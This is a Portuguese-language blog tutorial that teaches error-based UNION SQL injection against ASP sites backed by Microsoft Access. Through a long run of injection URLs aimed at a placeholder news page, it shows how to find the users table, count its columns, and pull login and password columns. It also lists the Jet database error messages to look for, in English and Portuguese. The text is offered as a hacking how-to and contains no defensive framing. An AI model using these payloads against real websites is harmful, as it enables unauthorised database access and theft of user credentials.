[Tutorial] Acess ou MySQL Error Injection

Esse metodo de injeções voce encontra apenas em maquinas windows rodando asp.net .

Tenho tal site:
http://www.site.com.br/view_noticia.asp?id_tb_noticia=132'

Com aspas no fim da string me retorna o erro ” Syntax error in string in query expression ‘minha_query_e_string”. “
Então o que devemos fazer é achar o nome da tabela, só que por meio de chute ( brute ) .
Para saber se achou a tabela correta se aparecer o erro “The Microsoft Jet database engine cannot find the input table or query ‘Renan’. Make sure it exists and that its name is spelled correctly.” é porque não encontrou ainda .
O erro que procuramos para confirmar a tabela correta é “The number of columns in the two selected tables or queries of a union query do not”
Exemplo:

login,logins,usuario,usuarios,etc…
http://www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0+from+login

Erro
http://www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0+from+logins

Erro
http://www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0+from+usuario

Erro
http://www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0+from+usuarios

Erro
http://www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0+from+tb_usuario

Achamos

No caso se achei a tabela nos retornaria outra mensagem como ” The number of columns in the two selected tables or queries of a union query do not ” , ou seja que o numero de tabelas não corresponde aquela tabela…

Vamos achar as colunas da seguinte maneira :
http://www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0+from+tb_usuario

Erro
http://www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0,1+from+tb_usuario

Erro
http://www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0,1,2+from+tb_usuario

Erro
http://www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0,1,2,3+from+tb_usuario

Erro
http://www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0,1,2,3,4+from+tb_usuario

Erro
http://www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0,1,2,3,4,5+from+tb_usuario

Achamos
etc…

Até nos retornar alguma string na pagina e não mais o erro.
Se achei a tabela e o numero de colunas , vamos achar o nomes das colunas , no caso se as strings de respostas da pagina seria 2 e 4 . Então :
http://www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0,1,login,3,4,5+from+tb_usuario

http://www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0,1,senha,3,4,5+from+tb_usuario

ou

http://www.site.com.br/view_noticia.asp?id_tb_noticia=132+union
+select+0,1,login,3,senha,5+from+tb_usuario

——————————–//—————————-

Quanto aos erros de consulta varia conforme a linguagem utilizada de alguns hosts porem o significado é o mesmo .
Exemplo pt_br – en

en-> Syntax error in string in query expression ‘minha_query_e_string”.
pt_br->Erro de sintaxe na seqüência de caracteres na expressão de consulta ‘minha_query_e_string”.

en-> The Microsoft Jet database engine cannot find the input table or query ‘Renan’. Make sure it exists and that its name is spelled correctly.
pt_br->O mecanismo de banco de dados Microsoft Jet não encontrou a tabela de entrada ou consulta ‘Renan’. Certifique-se de que ela existe e de que seu nome está digitado corretamente.

en-> The number of columns in the two selected tables or queries of a union query do not
pt_br->O número de colunas nas duas tabelas ou consultas selecionadas de uma consulta união não coincidem.

Crétidos: _Mlk_

  1. No trackbacks yet.

Deixe uma resposta

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s

%d blogueiros gostam disto: